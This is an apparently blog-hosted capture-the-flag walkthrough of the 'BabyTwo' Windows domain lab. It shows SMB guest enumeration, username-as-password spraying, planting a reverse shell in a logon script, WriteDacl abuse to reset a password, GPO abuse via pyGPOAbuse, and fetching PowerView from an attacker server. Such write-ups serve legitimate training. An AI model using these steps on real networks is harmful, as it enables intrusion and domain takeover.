# BabyTwo ## OVERVIEW --- ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760359871436/552ddd32-2393-4d80-a756-45cf78a07d1d.png align="center") So we have given IP address of the machine so Let’s head to Nmap to scan this IP ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760273879813/3663710d-630f-4de7-a631-912e40c5eb63.png align="center") As you can see we came to found the open ports and machine host name and its DC name So add both of them into **/etc/hosts** ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760360111156/fef94e80-4df2-42fd-9c52-0777e26a8e13.png align="center") So As we don’t have user password lets just try using guest login as guest as username and empty password ```apache nxc smb #MACHINE_IP -u guest -p '' ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760360267812/a995d366-0832-41e2-9f21-1b1d70c1a4be.png align="center") Here we go guest is allowed to access SMB server so Now let’s use **smbmap** to access the shares: ```apache smbmap -H 10.129.179.22 -u guest -p '' ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760360456626/221fb7ac-c0c7-424c-8300-a9de4b673805.png align="center") And we can see there is a share named as **homes** which guest user have READ,WRITE access So Let’s access the share using **smbclient** ```apache smbclient -U 'guest%' '//baby2.vl/homes' ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760360744830/1df952c4-f1bf-4526-b8f3-7a8c5fccc264.png align="center") We successfully got the access to the share and in that we can see there is a list of users so we can just save the users into a file Now Since we have users but don’t have their password so there is a slight chance that some of the users are using their name as both USERNAME and PASSWORD So let’s check it by spraying their username and password with the name of the users we got using **netexec** ```apache nxc smb 10.129.179.22 -u users.txt -p users.txt --no-bruteforce --continue-on-success ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760362297569/7d2eafd7-819f-4715-af9c-f587d7fa9bae.png align="center") Got two users who has set their username as their password so Now Let’s Access the shares using any of the user using smbmap again ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760362665498/a2b43631-c87c-453e-be0f-48990d1ddf58.png align="center") we got READ and WRITE access on docs and apps shares So let’s check it out: ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760367990115/e4eaa833-9cce-4dce-9c12-f1032c7549d1.png align="left") When I checked It is empty so let’s check SYSVOL share too ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760368521778/ffc2587d-ed30-4618-9633-28e37e40fedd.png align="center") I saw **login.vbs** file so let’s see what it consist of ```apache Sub MapNetworkShare(sharePath, driveLetter) Dim objNetwork Set objNetwork = CreateObject("WScript.Network") ' Check if the drive is already mapped Dim mappedDrives Set mappedDrives = objNetwork.EnumNetworkDrives Dim isMapped isMapped = False For i = 0 To mappedDrives.Count - 1 Step 2 If UCase(mappedDrives.Item(i)) = UCase(driveLetter & ":") Then isMapped = True Exit For End If Next If isMapped Then objNetwork.RemoveNetworkDrive driveLetter & ":", True, True End If objNetwork.MapNetworkDrive driveLetter & ":", sharePath If Err.Number = 0 Then WScript.Echo "Mapped " & driveLetter & ": to " & sharePath Else WScript.Echo "Failed to map " & driveLetter & ": " & Err.Description End If Set objNetwork = Nothing End Sub MapNetworkShare "\\dc.baby2.vl\apps", "V" MapNetworkShare "\\dc.baby2.vl\docs", "L" ``` This script is a logon script for users and it maps network shares. This means that it will be executed every time a user logs in. Since we have write access to this two share, we can embed a malicious reverse shell inside this file so that when a user logs in, it will be executed and give us a shell --- ## USER FLAG / LOCAL SHELL So first let’s head to [**revshells.com**](https://www.revshells.com/) and go to PowerShell base64 payloads ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760369606116/f639c5d5-00b1-436d-92a9-10439b69d3ee.png align="center") **NOTE: Keep In Mind To Change LOCAL MACHINE IP and Port** Now edit the login.vbs file in your local machine and put below commands in it : ```apache Set oShell = CreateObject("WScript.Shell") oShell.run "your-powershell-payload" ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760370099841/fe5361ff-73d9-446b-ad19-3731f320417c.png align="center") now go to the SMB shell and remove the file then again put it from the same directory where you had saved login.vbs ```apache del login.vbs put login.vbs ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760371197534/d1c36380-3d37-4390-83ee-673ad06a5f78.png align="center") Open a netcat shell on the port on your local Machine and you will get a shell ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760371441427/149341da-e52f-4d39-b3d6-ce6a03399ad7.png align="left") ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760371525150/6f990967-e763-4359-b5e1-bb6283847e4b.png align="left") So we are logged in with amelia.griffiths id **Now Go To C:\\ and get User Flag** --- ## PRIVILEGE ESCALATION / ROOT FLAG Now Remember we have Carle.Moore Id and Password So we can run bloodhound with it ```apache bloodhound-python -u Carl.Moore -p Carl.Moore -d baby2.vl -ns 10.129.179.22 -c ALL --zip ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760372310915/d3e9ed13-93c8-4d34-8063-15a70a352428.png align="center") Now Let’s Analyze it in bloodhound So open neo4j and run bloodhound ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760372807882/5e2fcda9-289e-4116-8da5-1e8e8b024a67.png align="center") ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760373212858/2c89fa39-204b-40c4-a8d3-665d33d9d3d9.png align="center") As you can see we own Amelia Griffiths user so shortest path from owned principal is above and we can notice that it is a member of **LEGACY@BABY2.VL** so we can see it has a WriteDacl to the user **GPOADM@BABY2.VL** then after owning that user we can do generic all for privilege escalation. --- ## WRITEDACL Now to do this attack you must have **PowerView.ps1** module so first git clone or download it from [https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon) to your local machine. Now start a local python server in that directory where you had downloaded the PowerView.ps1 module ```apache python3 -m http.server 8000 ``` and in PS C:\\Temp> download this module from the local machine to the shell ```apache Invoke-WebRequest -Uri 'http://LOCAL-SERVER-IP:8000/PowerView.ps1' -OutFile 'C:\Temp\PowerView.ps1' . C:\Temp\PowerView.ps1 ``` Now after running PowerView.ps1 module do this to change GPOADMIN Account password ```apache add-domainobjectacl -rights "all" -targetidentity "gpoadm" -principalidentity "Amelia.Griffiths" $cred = ConvertTo-SecureString 'Password123!' -AsPlainText -Force set-domainuserpassword gpoadm -accountpassword $cred ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760375429787/5afdb7c1-9022-4338-9199-660633e8bb5b.png align="center") Here We go our WriteDacl Attack was successful --- ## GENERIC ALL Now Let’s Get the root shell using Generic All Method which in case is ACL over the Group Policy Objects For this we will use [**pyGPOAbuse**](https://github.com/Hackndo/pyGPOAbuse) tool **In Your Local Machine terminal use this below command and the PowerShell rev shell is same as before (don’t include PowerShell -e )** **BE SURE TO PUT DIFFERENT PORT FROM BEFORE TO AVOID GETTING SAME LOCAL SHELL AGAIN** ```apache python3 pygpoabuse.py baby2.vl/gpoadm:'Password123!' -command "powershell -exec bypass -enc base64-rev-powershell" -dc-ip ATTACK-MACHINE-IP -gpo-id "YOUR-GPO-ID" ``` You will get you GPO ID from your bloodhound in Node properties section ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760375829176/fd15672f-a342-40bc-910c-1ba9dbb2af73.png align="center") **Example cmd:** ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760376047707/1f8d770f-fa35-495a-aa61-bf1330f9f6b3.png align="center") **Schedule Task is successfully created.** Now go to the local shell you got earlier and enter the command to get the root shell ```apache gpupdate ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760376310292/fc84fb4c-c1e7-4696-85fd-7b9f2156384b.png align="left") Now do netcat shell ```apache nc -lvnp 9000 ``` ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760376400932/4b579733-190b-4028-81e9-5c113c0dccde.png align="left") Here We Go !! We got the root shell now get the root.txt from **C:\\Users\\Administrator\\root.txt** ## **WE FINALLY DID IT !!!! CHALLENGE SOLVED !!** ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760376615600/cba13757-7f6f-4914-b703-b0a33c99b7a7.png align="center") For Any Query Or Problem Either Leave A Comment Or Contact At [**reapsec.com**](http://reapsec.com/) **THANKS FOR READING !!!**